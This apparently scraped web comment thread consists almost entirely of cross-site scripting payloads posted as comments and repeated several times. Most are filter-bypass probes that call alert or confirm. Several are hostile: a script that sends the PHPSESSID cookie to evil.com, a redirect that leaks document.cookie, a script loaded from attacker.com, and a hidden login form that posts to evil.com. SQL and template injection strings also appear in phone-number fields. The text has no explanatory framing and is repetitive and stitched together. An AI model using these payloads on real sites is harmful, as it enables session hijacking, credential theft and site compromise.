onmou<script>seover</script>="alert('xss')">hii</svg</script>> "><HTML onmouSeovEr=confirm(document.cookie)x> <a style="position: fixed; top: 0; left: 0; z-index: 99999; width: 100%; height: 100%;" onmouseover=alert(1)> <script>const getCookieValue=(name)=>(document.cookie.match("(^|;)\\s*" + name + "\\s*=\\s*([^;]+)")?.pop() || "");fetch("http://evil.com:1337/drop?c=" + getCookieValue("PHPSESSID"))</script> <<script>script>alert(1)<</script>/script> <svg><animatetransform onbegin=print()> %26%2302java%26%23115cript:alert(document.domain) <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e FUZZ"%27"><xmp><p+title%3D"<%2Fxmp><script>alert(document.cookie)<%2Fscript>> #"></div><a href= javascript:alert(document.domain) "onfocus="prompt(document.cookie)"autofocus=” Jorge+Rodriguez-p3axusnf<img/src=});alert() data-';alert('XSS by Jorge')">-<img src onerror="test=’ </base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script> <a href=javascript:alert(8)</a> \u0022\u003c%26quot;%26gt;%26lt;"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} <p><///style///><span %2F onmousemove='alert(1)'><strong>Click ME</strong></span></p> \"><svg><animate onbegin=prompt(document.cookie) attributeName=x dur=1s> %27;});alert(%27Ramen%27);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 <%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)> javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.cookie)\u0022\u003e "><h1/onmouseover=’\u0061lert(1)’> javascript:eval('con'+'fi'+'rm(doument.domain)') %3c%73%76%67%2f%6f%6e%6c%6f%61%64%3d%70%72%6f%6d%70%74%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%3e <button onclick="alert(1)">Click me, please</button> <iframe srcdoc="<script>alert(1)</script>"></iframe> <iframe src="javascript:alert(1)"></iframe> javascript:confirm(1) <a href="javascript:alert(1)">click me</a> javascript://huli.tw/%0aalert(1) javascript:alert@github.com/#:// javascript:alert%28%27Slonser%20was%20here%21%27%29%3B%2F%2F@github.com#;alert(10);://eow5kas78d0wlv0.m.pipedream.net%27 JaVaScRiP%0at:alert(document.domain) <!--><script>alert(1)</script>--> <div><iframe src=https://example.com></iframe></div> <!-- foo="bar--><s>Hi</s>" --> https://assets.matters.news/processed/1080w/embed/test style=animation-name:spinning onanimationstart=alert(1337) <script nonce=a2b5zsa19c>alert(1)</script> <style><a id="</style><img src=x onerror=alert(1)>"></a></style> <svg></p><style><a id="</style><img src=1 onerror=alert(1)>"> <details/open=/Open/href=/data=; ontoggle="(alert)(document.domain) xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto> Reply Reply as... Cancel
Kiko Kikiki 3 Months Ago n_vis=xssx'*$.getScript`//593.xss.ht`//; [size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size] "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> <inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"> </inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT; "onmouseover="alert(1) \"-alert(2)}// ${alert(3)} "><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)> <Svg Only=1 Onload="window.location='https://google.com'+document.cookie"> "/><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> "><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> <SVG/oNIY=1 ONLOAD=confirm(document.domain)> http://example.com%22%22,%7D)%3C/script%3E%3Csvg+onload=confirm(location)%3E "></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> %26%23%78%32%32%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%37%30%3b%26%23%78%37%32%3b%26%23%78%36%66%3b%26%23%78%36%64%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%32%38%3b%26%23%78%33%34%3b%26%23%78%32%39%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b %25%32%32%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%37%30%25%37%32%25%36%66%25%36%64%25%37%30%25%37%34%25%32%38%25%33%34%25%32%39%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65 <img src=1 onerror=alert(document.domain)> <><img src=1 onerror=alert(3)> {{$on.constructor('alert(4)')()}} javascript:alert(document.cookie) "><svg><animatetransform onbegin=alert(5)> '>"></title></style></textarea></script><script/src=attacker.com/js></script> ?msg=<img/src=`%00`%20onerror=this.onerror=confirm(6) &%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27 &toString().constructor.prototype.charAt%3d[].join;[7]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))> http://foo?'-alert(8)-' </textarea><ScRiPt>prompt(/hack the planet/)</ScRiPt// 22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E <iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> %3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27 %22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E%3C/textarea%3E%3CScRiPt%3Eprompt(document.cookie)%3C/ScRiPt// dz7b'-prompt(1)-'nrito <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> <image src=1 href=1 onerror="javascript:alert(1)"></image> "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[document.domain])</script> javascript:alert(document.domain) </Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> <script>alert(document.head.innerHTML.substr(77, 97, 120));</script> <iframe srcdoc='<body onload=prompt(51)>'> <script>alert(document.domain)</script> <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> "><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS <img src="https://brutelogic.com.br/poc.svg" width="500" height="600"> <img/src/oneror=alert(document['domain])> javascript://%0aalert(1) %7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D “><sVg/OnLuFy=”X=y”oNloaD=;1^confirm(1)>/``¹// <script>{onerror=eval}throw'=alert\x281337\x29'</script> <script>throw onerror=alert,'some string',123,'haha'</script> <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> xyz"/ng-click="constructor.c X-Forwarded-Host: bing.com"><img src/onerror=alert(4)> %3CA%20HREF%3d%22http%3a%2f%2fevil.com%22%3EClick%20Here%3C%2fA%3E <form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="Load more content"> " <a href=javascript:alert(document.cookie)>ClickMe</a> '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ <math><mtext><table><mglyph><style><![CDATA[</style><img title="]]></mglyph><img	src=1	onerror=alert("Mr_Mian")>"> %3Csvg%20onload=%0Aalert`xss-found`%3E <svg/onload=\u0061lert(String.fromC\u0061rCode(88,83,83))> +91 97xxxx7x7;phone-context=&phone- context=+9739343777 +91 97xxxx7x7;ext=1;ext=2 +91 97xxxx7x7;phone-context=' OR 1=1; - +91 97xxxx7x7;phone-context={{4*4}}{{5+5}} +91 97xxxx7x7;phone-context-burpcollaborator.net this[String.fromCharCode(97, 108, 101, 114, 116)](String.fromCharCode(72, 101, 108, 108, 111, 33)); this["al"+"ert"]`00` this['al\x65rt'].bind(this)('Hello, World!'); +[]["fill"]["constructor"]("alert(0)")(); this['ale\x72t'](0+0); this['al' + 'ert'].call(this, 0 + 0); !function(){ this['al\x65rt'](0 + 0); }(); +self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// 0..toLocaleString['constructor']`alert(0)`(); foo"><svG/onLoAd=confirm(1337)> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> ">]<img src=x onerror=alert(document.domain)> +9739343777;phone-context=<script>alert(1)</script> "\u003e\u003cimg src=1 onerror=alert(0)\u003e "><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))> <details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) “><sv\u01234\g\u01235/on\u01236load=confirm(1)> "><sv\u01234\g+s\01235\vg+\01236\svg \u01237\/ ----> \/\u01237\/\ ----> /\u01237\/ ----> / On\u01234\load ----> On\u01234\+OnLoAd ----> onload "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus javascript:%61lert(1) javascript:%61lert(1) javascript:%26%2337%26%2354%26%2349lert(1) "AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/" <a/href=”j	a	v	asc	ri	pt:alert(1)”> <s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/> <</div>script</div>>alert()<</div>/script</div>> <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> ';alert("8")%0D// onload="alert(document.domain) kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x> <SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x> <svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>> "><HTML onmouSeovEr=confirm(document.cookie)x> <a style="position: fixed; top: 0; left: 0; z-index: 99999; width: 100%; height: 100%;" onmouseover=alert(1)> <script>const getCookieValue=(name)=>(document.cookie.match("(^|;)\\s*" + name + "\\s*=\\s*([^;]+)")?.pop() || "");fetch("http://evil.com:1337/drop?c=" + getCookieValue("PHPSESSID"))</script> <<script>script>alert(1)<</script>/script> <svg><animatetransform onbegin=print()> %26%2302java%26%23115cript:alert(document.domain) <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e FUZZ"%27"><xmp><p+title%3D"<%2Fxmp><script>alert(document.cookie)<%2Fscript>> #"></div><a href= javascript:alert(document.domain) "onfocus="prompt(document.cookie)"autofocus=” Jorge+Rodriguez-p3axusnf<img/src=});alert() data-';alert('XSS by Jorge')">-<img src onerror="test=’ </base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script> <a href=javascript:alert(8)</a> \u0022\u003c%26quot;%26gt;%26lt;"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} <p><///style///><span %2F onmousemove='alert(1)'><strong>Click ME</strong></span></p> \"><svg><animate onbegin=prompt(document.cookie) attributeName=x dur=1s> %27;});alert(%27Ramen%27);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 <%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)> javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.cookie)\u0022\u003e "><h1/onmouseover=’\u0061lert(1)’> javascript:eval('con'+'fi'+'rm(doument.domain)') %3c%73%76%67%2f%6f%6e%6c%6f%61%64%3d%70%72%6f%6d%70%74%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%3e <button onclick="alert(1)">Click me, please</button> <iframe srcdoc="<script>alert(1)</script>"></iframe> <iframe src="javascript:alert(1)"></iframe> javascript:confirm(1) <a href="javascript:alert(1)">click me</a> javascript://huli.tw/%0aalert(1) javascript:alert@github.com/#:// javascript:alert%28%27Slonser%20was%20here%21%27%29%3B%2F%2F@github.com#;alert(10);://eow5kas78d0wlv0.m.pipedream.net%27 JaVaScRiP%0at:alert(document.domain) <!--><script>alert(1)</script>--> <div><iframe src=https://example.com></iframe></div> <!-- foo="bar--><s>Hi</s>" --> https://assets.matters.news/processed/1080w/embed/test style=animation-name:spinning onanimationstart=alert(1337) <script nonce=a2b5zsa19c>alert(1)</script> <style><a id="</style><img src=x onerror=alert(1)>"></a></style> <svg></p><style><a id="</style><img src=1 onerror=alert(1)>"> <details/open=/Open/href=/data=; ontoggle="(alert)(document.domain) xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto> Reply Reply as... Cancel
Kiko Kikiki 3 Months Ago n_vis=xssx'*$.getScript`//593.xss.ht`//; [size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size] "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> <inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"> </inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT; "onmouseover="alert(1) \"-alert(2)}// ${alert(3)} "><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)> <Svg Only=1 Onload="window.location='https://google.com'+document.cookie"> "/><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> "><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> <SVG/oNIY=1 ONLOAD=confirm(document.domain)> http://example.com%22%22,%7D)%3C/script%3E%3Csvg+onload=confirm(location)%3E "></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> %26%23%78%32%32%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%37%30%3b%26%23%78%37%32%3b%26%23%78%36%66%3b%26%23%78%36%64%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%32%38%3b%26%23%78%33%34%3b%26%23%78%32%39%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b %25%32%32%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%37%30%25%37%32%25%36%66%25%36%64%25%37%30%25%37%34%25%32%38%25%33%34%25%32%39%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65 <img src=1 onerror=alert(document.domain)> <><img src=1 onerror=alert(3)> {{$on.constructor('alert(4)')()}} javascript:alert(document.cookie) "><svg><animatetransform onbegin=alert(5)> '>"></title></style></textarea></script><script/src=attacker.com/js></script> ?msg=<img/src=`%00`%20onerror=this.onerror=confirm(6) &%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27 &toString().constructor.prototype.charAt%3d[].join;[7]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))> http://foo?'-alert(8)-' </textarea><ScRiPt>prompt(/hack the planet/)</ScRiPt// 22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E <iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> %3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27 %22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E%3C/textarea%3E%3CScRiPt%3Eprompt(document.cookie)%3C/ScRiPt// dz7b'-prompt(1)-'nrito <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> <image src=1 href=1 onerror="javascript:alert(1)"></image> "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[document.domain])</script> javascript:alert(document.domain) </Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> <script>alert(document.head.innerHTML.substr(77, 97, 120));</script> <iframe srcdoc='<body onload=prompt(51)>'> <script>alert(document.domain)</script> <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> "><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS <img src="https://brutelogic.com.br/poc.svg" width="500" height="600"> <img/src/oneror=alert(document['domain])> javascript://%0aalert(1) %7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D “><sVg/OnLuFy=”X=y”oNloaD=;1^confirm(1)>/``¹// <script>{onerror=eval}throw'=alert\x281337\x29'</script> <script>throw onerror=alert,'some string',123,'haha'</script> <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> xyz"/ng-click="constructor.c X-Forwarded-Host: bing.com"><img src/onerror=alert(4)> %3CA%20HREF%3d%22http%3a%2f%2fevil.com%22%3EClick%20Here%3C%2fA%3E <form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="Load more content"> " <a href=javascript:alert(document.cookie)>ClickMe</a> '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ <math><mtext><table><mglyph><style><![CDATA[</style><img title="]]></mglyph><img	src=1	onerror=alert("Mr_Mian")>"> %3Csvg%20onload=%0Aalert`xss-found`%3E <svg/onload=\u0061lert(String.fromC\u0061rCode(88,83,83))> +91 97xxxx7x7;phone-context=&phone- context=+9739343777 +91 97xxxx7x7;ext=1;ext=2 +91 97xxxx7x7;phone-context=' OR 1=1; - +91 97xxxx7x7;phone-context={{4*4}}{{5+5}} +91 97xxxx7x7;phone-context-burpcollaborator.net this[String.fromCharCode(97, 108, 101, 114, 116)](String.fromCharCode(72, 101, 108, 108, 111, 33)); this["al"+"ert"]`00` this['al\x65rt'].bind(this)('Hello, World!'); +[]["fill"]["constructor"]("alert(0)")(); this['ale\x72t'](0+0); this['al' + 'ert'].call(this, 0 + 0); !function(){ this['al\x65rt'](0 + 0); }(); +self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// 0..toLocaleString['constructor']`alert(0)`(); foo"><svG/onLoAd=confirm(1337)> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> ">]<img src=x onerror=alert(document.domain)> +9739343777;phone-context=<script>alert(1)</script> "\u003e\u003cimg src=1 onerror=alert(0)\u003e "><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))> <details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) “><sv\u01234\g\u01235/on\u01236load=confirm(1)> "><sv\u01234\g+s\01235\vg+\01236\svg \u01237\/ ----> \/\u01237\/\ ----> /\u01237\/ ----> / On\u01234\load ----> On\u01234\+OnLoAd ----> onload "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus javascript:%61lert(1) javascript:%61lert(1) javascript:%26%2337%26%2354%26%2349lert(1) "AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/" <a/href=”j	a	v	asc	ri	pt:alert(1)”> <s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/> <</div>script</div>>alert()<</div>/script</div>> <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> ';alert("8")%0D// onload="alert(document.domain) kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x> <SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x> <svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>> "><HTML onmouSeovEr=confirm(document.cookie)x> <a style="position: fixed; top: 0; left: 0; z-index: 99999; width: 100%; height: 100%;" onmouseover=alert(1)> <script>const getCookieValue=(name)=>(document.cookie.match("(^|;)\\s*" + name + "\\s*=\\s*([^;]+)")?.pop() || "");fetch("http://evil.com:1337/drop?c=" + getCookieValue("PHPSESSID"))</script> <<script>script>alert(1)<</script>/script> <svg><animatetransform onbegin=print()> %26%2302java%26%23115cript:alert(document.domain) <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e FUZZ"%27"><xmp><p+title%3D"<%2Fxmp><script>alert(document.cookie)<%2Fscript>> #"></div><a href= javascript:alert(document.domain) "onfocus="prompt(document.cookie)"autofocus=” Jorge+Rodriguez-p3axusnf<img/src=});alert() data-';alert('XSS by Jorge')">-<img src onerror="test=’ </base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script> <a href=javascript:alert(8)</a> \u0022\u003c%26quot;%26gt;%26lt;"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} <p><///style///><span %2F onmousemove='alert(1)'><strong>Click ME</strong></span></p> \"><svg><animate onbegin=prompt(document.cookie) attributeName=x dur=1s> %27;});alert(%27Ramen%27);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 <%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)> javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.cookie)\u0022\u003e "><h1/onmouseover=’\u0061lert(1)’> javascript:eval('con'+'fi'+'rm(doument.domain)') %3c%73%76%67%2f%6f%6e%6c%6f%61%64%3d%70%72%6f%6d%70%74%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%3e <button onclick="alert(1)">Click me, please</button> <iframe srcdoc="<script>alert(1)</script>"></iframe> <iframe src="javascript:alert(1)"></iframe> javascript:confirm(1) <a href="javascript:alert(1)">click me</a> javascript://huli.tw/%0aalert(1) javascript:alert@github.com/#:// javascript:alert%28%27Slonser%20was%20here%21%27%29%3B%2F%2F@github.com#;alert(10);://eow5kas78d0wlv0.m.pipedream.net%27 JaVaScRiP%0at:alert(document.domain) <!--><script>alert(1)</script>--> <div><iframe src=https://example.com></iframe></div> <!-- foo="bar--><s>Hi</s>" --> https://assets.matters.news/processed/1080w/embed/test style=animation-name:spinning onanimationstart=alert(1337) <script nonce=a2b5zsa19c>alert(1)</script> <style><a id="</style><img src=x onerror=alert(1)>"></a></style> <svg></p><style><a id="</style><img src=1 onerror=alert(1)>"> <details/open=/Open/href=/data=; ontoggle="(alert)(document.domain) xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto> Reply Reply as... Cancel